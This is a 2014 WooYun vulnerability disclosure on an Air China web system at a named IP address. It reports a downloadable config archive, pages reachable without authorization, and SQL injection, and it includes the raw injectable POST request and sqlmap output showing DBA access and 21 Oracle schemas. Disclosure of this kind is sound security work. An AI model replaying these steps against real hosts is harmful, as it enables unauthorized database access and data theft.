当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061181

漏洞标题:国航某系统配置文件下载+未授权访问+SQL注入多库

相关厂商:中国国际航空股份有限公司

漏洞作者: 小胖子

提交时间:2014-05-17 20:22

修复时间:2014-07-01 20:23

公开时间:2014-07-01 20:23

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-17: 细节已通知厂商并且等待厂商处理中
2014-05-19: 厂商已经确认,细节仅向厂商公开
2014-05-29: 细节向核心白帽子及相关领域专家公开
2014-06-08: 细节向普通白帽子公开
2014-06-18: 细节向实习白帽子公开
2014-07-01: 细节向公众公开

简要描述:

其实我是来刷WB的,谁叫我没WB参加众测了呢
谁叫你在最新确认列表里呢,就拿你刷了。

详细说明:

漏洞站点IP地址:
http://114.255.189.58/Default.aspx
首先http://114.255.189.58/web.rar可以直接访问下载,里面是web.config
可以看出是oracle的数据库,NET的架构。

webconfig.jpg


然后 发现http://114.255.189.58/letf.aspx
未授权访问可以直接打开
查看源代码

left.jpg


能看到一些连接,直接访问
http://114.255.189.58/Message/Cardit.aspx
还有其他用js跳转的,直接burp截断不要跳转,照样能访问页面,比如邮袋查询

youdai.jpg


x.jpg


点击确定burp不放行,然后,查询一个单引号试试

baocuo.jpg


爆出路径啥的。
抓一个包

POST /Message/Cardit.aspx HTTP/1.1
Host: 114.255.189.58
Proxy-Connection: keep-alive
Content-Length: 380
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://114.255.189.58
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1976.2 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://114.255.189.58/Message/Cardit.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTc4OTkyNDg0OQ9kFgICAw9kFgICDw88KwALAGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMT8aLp8YeyTD2ms9CZa5u5D4x50j&__EVENTVALIDATION=%2FwEWBgKYx6zXCALLwcg4Avf14qgNAuSW7PAJAun1sPAGAtLCmdMIL3op6DVLtgbieS2lYSwP0yTxYgc%3D&delete_rec=&txt_dDCDate=&fltno=1&dep_port=1&arr_port=1&ImageButton1.x=20&ImageButton1.y=10


丢到sqlmap,直接是注入 好多库

sql.jpg


数据:

web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
[17:42:40] [INFO] fetching current database
[17:42:43] [INFO] retrieved: EM
[17:42:43] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'EM'
[17:42:43] [INFO] testing if current user is DBA
current user is DBA: True


available databases [21]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EM
[*] EXFSYS
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


好吧
不继续了,不读数据进系统了。

漏洞证明:

见详细说明

修复方案:

针对几个地方修补一下。
求20rank,我真的是来刷WB的,我要参加众测!!!!

版权声明:转载请注明来源 小胖子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-05-19 09:14

厂商回复:

感谢给国航安全的帮助!

最新状态:

暂无


漏洞评价:

评论

  1. 2014-05-17 20:49 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    mark

  2. 2014-05-17 20:57 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    胖子V5

  3. 2014-05-17 22:58 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    还有时间来乌云啊

  4. 2014-05-18 13:02 | 橘子 ( 路人 | Rank:0 漏洞数:3 | 呢个...羞射高中生一枚。带上大神@Haswell...)

    V5